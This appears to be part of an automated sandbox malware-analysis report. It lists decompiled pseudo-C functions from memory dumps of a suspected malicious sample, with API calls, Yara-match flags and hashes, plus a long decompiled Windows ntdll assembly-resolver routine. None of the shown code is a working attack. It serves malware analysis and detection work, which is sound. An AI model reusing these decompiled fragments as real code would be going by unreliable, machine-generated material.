                                                                                                                                                    			E004184DF(void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t10;

				_t7 = _v0;
				_t3 = _t7 + 0xc74; // 0xc74
				E00418DD0(_v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t10;
			}





                                                                                                                                                    0x004184e3
                                                                                                                                                    0x004184ef
                                                                                                                                                    0x004184f7
                                                                                                                                                    0x0041850d
                                                                                                                                                    0x00418511

                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                    • Opcode ID: b5b276ecc2cd6708aeab09043ff434cd78b90f757783ee2c3e127b5fa2d59790
                                                                                                                                                    • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                                                                                                    • Opcode Fuzzy Hash: b5b276ecc2cd6708aeab09043ff434cd78b90f757783ee2c3e127b5fa2d59790
                                                                                                                                                    • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                                                    0x004184ef
                                                                                                                                                    0x004184f7
                                                                                                                                                    0x0041850d
                                                                                                                                                    0x00418511

                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                    • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                    • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                    • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                                                                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                    • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00418520(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E00418DD0(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                                                                                    0x00418523
                                                                                                                                                    0x0041853a
                                                                                                                                                    0x00418548

                                                                                                                                                    APIs
                                                                                                                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418548
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                    • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                                                                                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                    • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 0094C5F0, Relevance: 14.2, Strings: 11, Instructions: 424COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 55%
                                                                                                                                                    			E0094C5F0(intOrPtr _a4, char _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v544;
				char _v1064;
				char _v1068;
				char _v1069;
				signed short* _v1076;
				signed short _v1080;
				intOrPtr _v1084;
				signed short _v1086;
				char _v1088;
				char _v1092;
				signed short _v1096;
				char _v1100;
				char* _v1104;
				short _v1106;
				char _v1108;
				char _v1111;
				char _v1112;
				signed short _v1116;
				char _v1120;
				intOrPtr _v1124;
				short _v1126;
				char _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				char _v1144;
				intOrPtr _v1148;
				short _v1150;
				char _v1152;
				char* _v1156;
				short _v1158;
				char _v1160;
				intOrPtr _v1164;
				intOrPtr _v1172;
				intOrPtr _v1176;
				char _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				char* _v1196;
				intOrPtr _v1200;
				char _v1204;
				char _v1212;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t173;
				intOrPtr _t175;
				void* _t191;
				void* _t193;
				intOrPtr _t200;
				char _t215;
				void* _t226;
				signed short _t250;
				void* _t284;
				signed short _t286;
				unsigned int _t292;
				short _t294;
				signed int _t295;
				void* _t296;

				_t173 =  *0xa02088; // 0x7745a8fa
				_v8 = _t173 ^ _t295;
				_t175 = _a4;
				_t272 = _a8;
				_v1132 = _a16;
				_v1140 = _a20;
				_v1160 = 0;
				_v1158 = 0x208;
				_v1156 =  &_v1064;
				_t282 = 0;
				_t288 = 0;
				_t286 = _a12;
				_v1164 = _t175;
				_v1069 = 0;
				_v1068 = 0;
				_v1136 = 0;
				_v1088 = 0;
				_v1086 = 0;
				_v1084 = 0;
				_v1128 = 0;
				_v1126 = 0;
				_v1124 = 0;
				_v1144 = 0;
				if(_t175 == 0) {
					_t282 = 0;
					L66:
					_push(_t282);
					_push(_t286);
					_push(_t272);
					_push(_t175);
					L00973F92(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
					_t288 = 0xc000000d;
					L18:
					if(_v1069 == 0) {
						L20:
						if(_v1084 != 0) {
							 *0x92e6f0(_v1084);
						}
						if(_v1068 != 0) {
							E0091F9F0(_v1068);
						}
						if(_v1136 != 0) {
							E0092E025(_t272,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v1136);
						}
						L23:
						return E0092E1B4(_t288, 0, _v8 ^ _t295, _t282, _t286, _t288);
					}
					L19:
					_v1120 = _v1144;
					_v1132(4,  &_v1120, _v1140);
					goto L20;
				}
				if(_t272 == 0 || _t286 < 1 || _t286 >  *((intOrPtr*)(_t175 + 4))) {
					_t282 =  *((intOrPtr*)(_t175 + 4));
					goto L66;
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(_t175 + 8)) + _t286 * 4)) != 0) {
						goto L23;
					}
					_t284 =  *((intOrPtr*)(_t272 + 0x18)) + _t272;
					_t191 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0xc)) + _t286 * 0x18 + _t272 + 0x10)) + _t272;
					_t291 =  *((intOrPtr*)(_t191 + 0x50));
					_t282 =  *((intOrPtr*)(_t284 + 0x10)) + _t272;
					if( *((intOrPtr*)(_t191 + 0x50)) > 0xfffe) {
						_push(_t272);
						L00973F92(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t291);
						L39:
						_t288 = 0xc0000106;
						goto L20;
					}
					if(( *(_t191 + 4) & 0x00000010) != 0) {
						L27:
						_v1076 =  &_v1160;
						_t286 =  *((intOrPtr*)(_t191 + 0x18)) + _t282;
						_v1080 = _t286;
						if(_t286 == 0) {
							_t288 = 0xc00000e5;
							goto L23;
						}
						_t193 = E00938342(_t286, 0x5c);
						_pop(_t272);
						if(_t193 == 0) {
							_t288 = 0xc00000e5;
							goto L20;
						}
						_t286 = (_t193 - _t286 >> 0x00000001) + (_t193 - _t286 >> 0x00000001) + 0x00000004 & 0x0000ffff;
						if(_t286 > 0x208) {
							if(_t286 > 0xfffe) {
								goto L39;
							}
							_v1086 = _t286;
							_t200 =  *0x92e6f4(_t286 & 0x0000ffff);
							_v1084 = _t200;
							if(_t200 != 0) {
								_v1076 =  &_v1088;
								goto L30;
							}
							_t288 = 0xc0000017;
							goto L20;
						}
						L30:
						_t292 = _t286 & 0x0000ffff;
						E00922340(_v1076[2], _v1080, _t292 - 2);
						_t272 = 0;
						 *((short*)(_v1076[2] + (_t292 >> 1) * 2 - 2)) = 0;
						_t296 = _t296 + 0xc;
						 *_v1076 = _t286;
						L15:
						if(_v1068 == 0) {
							if(L0093DA3A(_v1076[2],  &_v1128, 0,  &_v1180) == 0) {
								L00973F92(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _v1076[2]);
								_t288 = 0xc000003a;
								goto L18;
							}
							_v1136 = _v1124;
							_t215 = _v1180;
							if(_t215 != 0) {
								_v1128 = _t215;
								_v1124 = _v1176;
							} else {
								_v1172 = 0;
							}
							_v1200 = _v1172;
							_push(0x21);
							_v1196 =  &_v1128;
							_push(3);
							_push( &_v1212);
							_push( &_v1204);
							_push(0x100020);
							_v1204 = 0x18;
							_v1192 = 0x40;
							_v1188 = 0;
							_v1184 = 0;
							_t288 = L0091FD74( &_v1068);
							E0093A331( &_v1180, _t272,  &_v1180);
							if(_t288 >= 0) {
								goto L16;
							} else {
								_push(_t288);
								L00973F92(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _v1076[2]);
								goto L18;
							}
						}
						L16:
						_t226 = L0094CC91(_v1164, _a12, _v1076,  &_v1068);
						_t288 = _t226;
						if(_t226 < 0) {
							L00973F92(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t288);
						} else {
							_t288 = 0;
						}
						goto L18;
					}
					_v1076 = 0;
					_t294 =  *((intOrPtr*)(_t191 + 0x50));
					_v1152 = _t294;
					_v1150 = _t294;
					_v1148 =  *((intOrPtr*)(_t191 + 0x54)) + _t282;
					_v1108 = 0;
					_v1106 = 0x216;
					_v1104 =  &_v544;
					_v1120 = _t272;
					_v1116 = _t286;
					_v1112 = 0;
					_v1100 = 0;
					_v1092 = 0;
					_v1096 = 0;
					_v1132(1,  &_v1120, _v1140);
					if(_v1092 != 0) {
						_t288 = 0xc0000120;
						goto L20;
					}
					if(_v1100 != 0) {
						_t288 = E0094D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
						if(_t288 >= 0) {
							_t288 = L0094CC91(_v1164, _t286,  &_v1108,  &_v1068);
							if(_t288 >= 0) {
								_t288 = 0;
								goto L20;
							}
							_push(_t288);
							_push(_t286);
							_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
							L50:
							_push(0);
							_push(0x33);
							L00973F92();
							goto L20;
						}
						_push(_t288);
						_push( &_v1108);
						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
						goto L50;
					}
					_v1144 = _v1112;
					_t250 = _v1096;
					_t286 = 0;
					_v1080 = _t250;
					_v1069 = 1;
					if(_t250 <= 0) {
						L14:
						if(_t286 == _v1080) {
							L59:
							_push(_t286);
							L00973F92(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
							_t288 = 0xc0150004;
							goto L19;
						}
						goto L15;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_v1120 = _v1144;
						_v1108 = 0;
						_v1106 = 0x216;
						_v1104 =  &_v544;
						_v1116 = _t286;
						_v1112 = 0;
						_v1111 = 0;
						_v1132(2,  &_v1120, _v1140);
						if(_v1112 != 0) {
							break;
						}
						if(_v1111 != 0) {
							if(_v1108 == 0) {
								goto L59;
							}
							_t159 = _t286 + 1; // 0x1
							_v1080 = _t159;
						}
						if(_v1108 != 0) {
							if(_v1068 != 0) {
								E0091F9F0(_v1068);
								_v1068 = 0;
							}
							_t288 = E0094D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
							if(_t288 >= 0) {
								goto L14;
							} else {
								if(_t288 == 0xc0150004) {
									goto L13;
								} else {
									_push(_t288);
									_push( &_v1152);
									L00973F92(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1108);
									goto L19;
								}
								goto L27;
							}
						}
						L13:
						_t286 = _t286 + 1;
						if(_t286 < _v1080) {
							continue;
						}
						goto L14;
					}
					_t288 = 0xc0000120;
					goto L19;
				}
			}
































































                                                                                                                                                    0x0094c5fb
                                                                                                                                                    0x0094c602
                                                                                                                                                    0x0094c608
                                                                                                                                                    0x0094c60b
                                                                                                                                                    0x0094c60e
                                                                                                                                                    0x0094c617
                                                                                                                                                    0x0094c61f
                                                                                                                                                    0x0094c62e
                                                                                                                                                    0x0094c63c
                                                                                                                                                    0x0094c642
                                                                                                                                                    0x0094c644
                                                                                                                                                    0x0094c647
                                                                                                                                                    0x0094c64a
                                                                                                                                                    0x0094c650
                                                                                                                                                    0x0094c656
                                                                                                                                                    0x0094c65c
                                                                                                                                                    0x0094c662
                                                                                                                                                    0x0094c669
                                                                                                                                                    0x0094c670
                                                                                                                                                    0x0094c676
                                                                                                                                                    0x0094c67d
                                                                                                                                                    0x0094c684
                                                                                                                                                    0x0094c68a
                                                                                                                                                    0x0094c692
                                                                                                                                                    0x0098557b
                                                                                                                                                    0x0098557d
                                                                                                                                                    0x0098557d
                                                                                                                                                    0x0098557e
                                                                                                                                                    0x0098557f
                                                                                                                                                    0x00985580
                                                                                                                                                    0x0098558e
                                                                                                                                                    0x00985596
                                                                                                                                                    0x0094c874
                                                                                                                                                    0x0094c87a
                                                                                                                                                    0x0094c89d
                                                                                                                                                    0x0094c8a3
                                                                                                                                                    0x009855a6
                                                                                                                                                    0x009855a6
                                                                                                                                                    0x0094c8af
                                                                                                                                                    0x009855b7
                                                                                                                                                    0x009855b7
                                                                                                                                                    0x0094c8bb
                                                                                                                                                    0x009622ee
                                                                                                                                                    0x009622ee
                                                                                                                                                    0x0094c8c1
                                                                                                                                                    0x0094c8d1
                                                                                                                                                    0x0094c8d1
                                                                                                                                                    0x0094c87c
                                                                                                                                                    0x0094c888
                                                                                                                                                    0x0094c897
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c897
                                                                                                                                                    0x0094c69a
                                                                                                                                                    0x009622f8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c6b2
                                                                                                                                                    0x0094c6b8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c6c6
                                                                                                                                                    0x0094c6d4
                                                                                                                                                    0x0094c6d6
                                                                                                                                                    0x0094c6d9
                                                                                                                                                    0x0094c6e1
                                                                                                                                                    0x00985384
                                                                                                                                                    0x0098538e
                                                                                                                                                    0x00985396
                                                                                                                                                    0x00985396
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00985396
                                                                                                                                                    0x0094c6eb
                                                                                                                                                    0x00962196
                                                                                                                                                    0x0096219c
                                                                                                                                                    0x009621a5
                                                                                                                                                    0x009621a7
                                                                                                                                                    0x009621ad
                                                                                                                                                    0x009853a0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009853a0
                                                                                                                                                    0x009621b6
                                                                                                                                                    0x009621bc
                                                                                                                                                    0x009621bf
                                                                                                                                                    0x009853aa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009853aa
                                                                                                                                                    0x009621cd
                                                                                                                                                    0x009621d8
                                                                                                                                                    0x009853bc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009853c2
                                                                                                                                                    0x009853c9
                                                                                                                                                    0x009853cf
                                                                                                                                                    0x009853d7
                                                                                                                                                    0x009853e9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009853e9
                                                                                                                                                    0x009853d9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009853d9
                                                                                                                                                    0x009621de
                                                                                                                                                    0x009621de
                                                                                                                                                    0x009621f4
                                                                                                                                                    0x00962204
                                                                                                                                                    0x00962206
                                                                                                                                                    0x00962211
                                                                                                                                                    0x00962217
                                                                                                                                                    0x0094c841
                                                                                                                                                    0x0094c847
                                                                                                                                                    0x0096223e
                                                                                                                                                    0x00985405
                                                                                                                                                    0x0098540d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098540d
                                                                                                                                                    0x0096224a
                                                                                                                                                    0x00962250
                                                                                                                                                    0x00962259
                                                                                                                                                    0x0098552f
                                                                                                                                                    0x0098553b
                                                                                                                                                    0x0096225f
                                                                                                                                                    0x0096225f
                                                                                                                                                    0x0096225f
                                                                                                                                                    0x0096226b
                                                                                                                                                    0x00962271
                                                                                                                                                    0x00962279
                                                                                                                                                    0x0096227f
                                                                                                                                                    0x00962287
                                                                                                                                                    0x0096228e
                                                                                                                                                    0x0096228f
                                                                                                                                                    0x0096229b
                                                                                                                                                    0x009622a5
                                                                                                                                                    0x009622af
                                                                                                                                                    0x009622b5
                                                                                                                                                    0x009622c0
                                                                                                                                                    0x009622c9
                                                                                                                                                    0x009622d0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009622d6
                                                                                                                                                    0x0098554c
                                                                                                                                                    0x00985558
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098555d
                                                                                                                                                    0x009622d0
                                                                                                                                                    0x0094c84d
                                                                                                                                                    0x0094c863
                                                                                                                                                    0x0094c868
                                                                                                                                                    0x0094c86c
                                                                                                                                                    0x0098556e
                                                                                                                                                    0x0094c872
                                                                                                                                                    0x0094c872
                                                                                                                                                    0x0094c872
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c86c
                                                                                                                                                    0x0094c6f7
                                                                                                                                                    0x0094c6fd
                                                                                                                                                    0x0094c701
                                                                                                                                                    0x0094c708
                                                                                                                                                    0x0094c714
                                                                                                                                                    0x0094c71c
                                                                                                                                                    0x0094c728
                                                                                                                                                    0x0094c735
                                                                                                                                                    0x0094c744
                                                                                                                                                    0x0094c74a
                                                                                                                                                    0x0094c750
                                                                                                                                                    0x0094c756
                                                                                                                                                    0x0094c75c
                                                                                                                                                    0x0094c762
                                                                                                                                                    0x0094c768
                                                                                                                                                    0x0094c774
                                                                                                                                                    0x00985417
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00985417
                                                                                                                                                    0x0094c780
                                                                                                                                                    0x00985451
                                                                                                                                                    0x00985455
                                                                                                                                                    0x0098548e
                                                                                                                                                    0x00985492
                                                                                                                                                    0x0098549d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098549d
                                                                                                                                                    0x00985494
                                                                                                                                                    0x00985495
                                                                                                                                                    0x00985496
                                                                                                                                                    0x00985464
                                                                                                                                                    0x00985464
                                                                                                                                                    0x00985465
                                                                                                                                                    0x00985467
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098546c
                                                                                                                                                    0x00985457
                                                                                                                                                    0x0098545e
                                                                                                                                                    0x0098545f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098545f
                                                                                                                                                    0x0094c78c
                                                                                                                                                    0x0094c792
                                                                                                                                                    0x0094c798
                                                                                                                                                    0x0094c79a
                                                                                                                                                    0x0094c7a0
                                                                                                                                                    0x0094c7a9
                                                                                                                                                    0x0094c835
                                                                                                                                                    0x0094c83b
                                                                                                                                                    0x009854df
                                                                                                                                                    0x009854df
                                                                                                                                                    0x009854ef
                                                                                                                                                    0x009854f7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009854f7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c7af
                                                                                                                                                    0x0094c7af
                                                                                                                                                    0x0094c7bb
                                                                                                                                                    0x0094c7c3
                                                                                                                                                    0x0094c7cf
                                                                                                                                                    0x0094c7dc
                                                                                                                                                    0x0094c7eb
                                                                                                                                                    0x0094c7f1
                                                                                                                                                    0x0094c7f7
                                                                                                                                                    0x0094c7fd
                                                                                                                                                    0x0094c809
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c815
                                                                                                                                                    0x009854ab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009854ad
                                                                                                                                                    0x009854b0
                                                                                                                                                    0x009854b0
                                                                                                                                                    0x0094c822
                                                                                                                                                    0x0094d03e
                                                                                                                                                    0x009854c1
                                                                                                                                                    0x009854c6
                                                                                                                                                    0x009854c6
                                                                                                                                                    0x0094d074
                                                                                                                                                    0x0094d078
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094d07e
                                                                                                                                                    0x009854d7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009854dd
                                                                                                                                                    0x0098550b
                                                                                                                                                    0x00985512
                                                                                                                                                    0x00985522
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00985527
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009854d7
                                                                                                                                                    0x0094d078
                                                                                                                                                    0x0094c828
                                                                                                                                                    0x0094c828
                                                                                                                                                    0x0094c82f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c82f
                                                                                                                                                    0x00985501
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00985501

                                                                                                                                                    Strings
                                                                                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00985496
                                                                                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00985586
                                                                                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00985566
                                                                                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 009853FD
                                                                                                                                                    • @, xrefs: 009622A5
                                                                                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 009854E7
                                                                                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 0098551A
                                                                                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 0098545F
                                                                                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00985550
                                                                                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00985386
                                                                                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 00985581
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                    • API String ID: 0-4009184096
                                                                                                                                                    • Opcode ID: 9e5e522afb8ae4ef75f9f0aa2f583a5216ca2cdf94b4048a6b570be0d759b627
                                                                                                                                                    • Instruction ID: 09c7365fae5c2fbb321cd2900f151cb30b007dd4d4e344874905c6ca7dc66b8f
                                                                                                                                                    • Opcode Fuzzy Hash: 9e5e522afb8ae4ef75f9f0aa2f583a5216ca2cdf94b4048a6b570be0d759b627
                                                                                                                                                    • Instruction Fuzzy Hash: 80023CF2D016289FDB60DF54CC80BEAB7B8AF55304F4541EAE609A7212E6309F84CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009D098E, Relevance: 11.7, Strings: 9, Instructions: 401COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                    			E009D098E(void* __ecx, unsigned int __edx, signed int _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				signed int* _v16;
				signed int _v20;
				signed int _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t165;
				intOrPtr _t168;
				signed short _t181;
				intOrPtr _t183;
				signed int* _t204;
				signed int _t209;
				signed int _t214;
				signed int* _t216;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				intOrPtr _t235;
				intOrPtr _t246;
				intOrPtr _t257;
				signed int _t280;
				signed int* _t281;
				signed int* _t282;
				signed short _t284;
				signed short _t286;
				signed char _t288;
				intOrPtr* _t298;
				signed int _t309;
				signed int _t310;
				signed int* _t311;
				unsigned int _t312;
				signed int* _t313;
				signed int _t314;
				signed int _t315;
				intOrPtr _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;

				_t308 = __edx;
				_t311 = _a4;
				_v12 = 0;
				_v8 = 0;
				_v16 = _t311;
				if(L009CFB7A(__ecx, __edx, _t311, 0) == 0) {
					L84:
					E009D06F9(_v16);
					_t337 = _v8;
					if(_v8 != 0) {
						_a4 = _a4 & 0x00000000;
						E00934167(_t308, _t337, 0xffffffff,  &_v8,  &_a4, 0x8000);
					}
					L48:
					return 0;
				}
				if(_a8 != 0 || (_t311[0x10] & 0x20000000) != 0) {
					_t308 = 0;
					_t165 =  &(_t311[0x31]);
					_t280 =  *_t165;
					_a8 = 0;
					_v24 = 0;
					while(_t165 != _t280) {
						_t280 =  *_t280;
